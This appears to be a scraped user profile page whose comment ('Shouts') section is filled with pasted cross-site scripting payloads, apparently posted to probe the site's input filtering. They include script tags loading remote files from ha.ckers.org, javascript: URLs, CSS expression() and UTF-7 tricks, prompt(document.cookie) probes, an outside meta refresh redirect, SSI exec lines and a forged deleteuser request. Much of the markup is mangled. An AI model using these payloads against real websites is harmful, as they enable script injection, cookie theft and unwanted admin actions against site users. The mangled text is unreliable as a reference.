
hackerone-alyssa

hackerone-alyssa


Profile

2"-->2"-->2"-->

Statistics

Joined 8 February 2018

185
Pageviews
0
Followers
0
Favorites Given
0
Favorites Received
4
Submissions
0
Journals
0
Following

Shouts

  • Link

    jav ascript:alert('XSS');
    perl -e 'print "java\0script:alert(\"XSS\")";' > out




    <alert(&quot;XSS&quot;);//&lt;<p><SCRIPT SRC=//ha.ckers.org/.j><br><IMG SRC="javascript:alert('XSS')"<br><iframe src=http://ha.ckers.org/scriptlet.html <<br>\";alert('XSS');//<br></TITLE><SCRIPT>alert(&quot;XSS&quot;);</p>




    <p>li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}
    • XSS
      vbscript:msgbox("XSS")
      livescript:[code]






      @import&#39;<a href="http://ha.ckers.org/xss.css">http://ha.ckers.org/xss.css</a>&#39;;</p>

      http://ha.ckers.org/xssmoz.xml#xss")}

      <p>@im\port&#39;\ja\vasc\ript:alert(&quot;XSS&quot;)&#39;;</p>


      exp/<A STYLE='no\xss:noxss("//");xss:ex/*XSS////pression(alert("XSS"))'>

      <p>alert(&#39;XSS&#39;);</p><p>.XSS{background-image:url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}
      BODY{background:url(&quot;javascript:alert(&#39;XSS&#39;)&quot;)}</p><p>BODY{background:url(&quot;javascript:alert(&#39;XSS&#39;)&quot;)}</p>



      ¼script¾alert(¢XSS¢)¼/script¾











      <!--#exec cmd="/bin/echo '<!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js>'"-->
      <? echo('alert("XSS")'); ?>
      http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode
      Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
      +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

      <p>&quot; SRC=&quot;<a href="http://ha.ckers.org/xss.js%22%3E">http://ha.ckers.org/xss.js&quot;&gt;</a></p>'" SRC="http://ha.ckers.org/xss.js"><p>` SRC=&quot;<a href="http://ha.ckers.org/xss.js%22%3E">http://ha.ckers.org/xss.js&quot;&gt;</a></p><p>document.write(&quot;<SCRI");PT SRC="http://ha.ckers.org/xss.js">

      XSS
      XSS
      XSS
      XSS
      XSS
      XSS

      {font-family&colon;&#39;<iframe/onload=confirm(1)>&#39; </p></body></html>

  • Link

    p[foo=bar{}<em>{-o-link:&#39;javascript:javascript:alert(1)&#39;}{}</em>{-o-link-source:current}]{color:red};@import "data:,%7bx:expression(javascript:alert(1))%7D";XXXXXX[{}@import'%(css)s?]X

    XXX
    XXX<// style=x:expression\28javascript:alert(1)\29><em>{x:expression(javascript:alert(1))}
    X
    X
    with(document.getElementById(&quot;d&quot;))innerHTML=innerHTML<div style="background:url(/f#oo/;color:red//foo.jpg);">X
    X
    XXX
    #x{font-family:foo[bar;color:green;} #y];color:red;{} XXX({set/<strong>/$($){_/</strong>/setter=$,<em>=javascript:alert(1)}}).$=eval({0:#0=eval/#0#/#0#(javascript:alert(1))})ReferenceError.prototype.<strong>defineGetter</strong>(&#39;name&#39;, function(){javascript:alert(1)}),xObject.<strong>noSuchMethod</strong> = Function,[{}][0].constructor.</em>(&#39;javascript:alert(1)&#39;)()&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi&alert&amp;A7&amp;(1)&amp;R&UA;&amp;&amp;&lt;&amp;A9&amp;11/script&amp;X&amp;&gt;<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`></p></body></html>
  • Link

    CLICKME

    CLICKME



    <!----><img src=x onerror=javascript:alert(1)//
    </comment><img src=x onerror=javascript:alert(1))//
    <![>]><img src=x onerror=javascript:alert(1)//
    <img src="x

  • XXX<p>javascript:alert(1)</p>




    alert(1)0

    document.getElementById(&quot;div2&quot;).innerHTML = document.getElementById(&quot;div1&quot;).innerHTML;


    javascript:alert(1)

    <p><div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x<br>&lt;? foo=&quot;&gt;<script>javascript:alert(1)">
    <! foo=">javascript:alert(1)">
    </ foo=">javascript:alert(1)">
    <? foo=">

    `><img src=x:x onerror=javascript:alert(1)></a>"></p>
<!--[if]><script>javascript:alert(1)</script -->
<!--[if<img src=x onerror=javascript:alert(1)//]> -->
<script src=


    X

  • Link

    al

    <p>$=1,alert($)</p><p>confirm(1)
    $=1,\u0061lert($)</p>

    <eval(&#39;\u&#39;+&#39;0061&#39;+&#39;lert(1)&#39;)//
    <\u0061lert(1)
    alert(1)

    String.fromCharCode(88,83,83)
    alert&#40;&#39;1&#39;&amp;#41</x><br><iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'></p></body></html>

  • Link

  • Link

    ">











  • Link

    a)
    a)
    a)\
    javascript:prompt(document.cookie)
    <&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
    a\
    a
    a
    a'"`onerror=prompt(document.cookie)\

    notmalicious
    test)
    test;com)
    notmalicious
    notmalicious
    a
    clickme)
    http://danlec@.1 style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);//
    http://<meta http-equiv="refresh" content="0; url=http://danlec.com/">
    text
    a)
    a
    a
    a
    a
    a
    a)
    a;com)
    a
    a
    /http://<?php><h1><script:scriptconfirm(2)